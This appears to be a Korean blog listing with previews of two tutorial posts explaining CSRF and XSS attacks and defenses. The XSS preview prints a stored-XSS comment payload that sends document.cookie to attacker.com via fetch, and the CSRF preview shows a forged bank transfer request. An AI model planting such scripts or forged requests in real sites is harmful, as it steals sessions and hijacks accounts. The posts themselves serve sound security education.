Category: Security

2025
0
Security

[Web Security] CSRF 공격과 방어 기법 완벽 가이드

🎯 CSRF(Cross-Site Request Forgery)란?CSRF는 사용자가 의도하지 않은 요청을 공격자가 만든 웹사이트를 통해 실행시키는 공격입니다.사용자가 이미 로그인되어 있는 사이트에서, 공격자가 조작한 요청을 사용자 몰래 전송하게 만듭니다. 공격 시나리오 예시 사용자가 은행 사이트(bank.com)에 로그인되어 있음 공격자가 만든 악성 사이트(evil.com)를 방문 악성 사이트에 숨겨진 코드가 bank.com으로 송금 요청을 전송 브라우저는 자동으로 쿠키를 포함해 요청을 전송 은행 서버는 정상적인 요청으로 인식하고 처리 🔍 CSRF 공격의 핵심 원리브라우저의 쿠키 자동 전송브라우저는 같은 도메인으로의 모든 요청에 자동으로 쿠키를 첨부합니다. GET /transfer?to=attacker&amount=10000 HTTP/1.1Host: bank.comCookie: session_id=abc123 ← 자동으로 포함됨! 공격 코드 예시1. 이미지 태그를 이용한 공격

0
Security

[Web Security] XSS 공격과 방어 기법 완벽 가이드

🎯 XSS(Cross-Site Scripting)란?XSS는 공격자가 웹 페이지에 악성 스크립트를 삽입하여 다른 사용자의 브라우저에서 실행시키는 공격입니다.사용자의 쿠키, 세션 토큰을 탈취하거나, 사용자인 척 행동할 수 있습니다. XSS vs CSRF 차이점 구분 XSS CSRF 공격 대상 웹사이트의 사용자 웹사이트의 서버 공격 방식 악성 스크립트 실행 사용자 권한으로 요청 전송 주요 수단 JavaScript 주입 자동 폼 제출, 이미지 태그 탈취 가능 쿠키, 세션, DOM, 키 입력 등 불가능 (요청만 가능) 🔍 XSS 공격 유형1. Stored XSS (저장형)악성 스크립트가 서버 데이터베이스에 저장되어, 해당 페이지를 보는 모든 사용자에게 실행됩니다.가장 위험한 XSS 공격입니다. 공격 시나리오// 게시판 댓글 작성const comment = '<script> fetch("https://attacker.com/steal?cookie=" + document.cookie);</script>';// 서버에 저장됨// DB: comments 테이블에 위 스크립트가 그대로 저장// 다른 사용자가 게시글을 볼 때<div class="comment"> <script> fetch("https://attacker.com/steal?cookie=" + document.cookie); </script></div>// ⚠️ 모든 방문자의 쿠키가 탈취됨! 실제 사례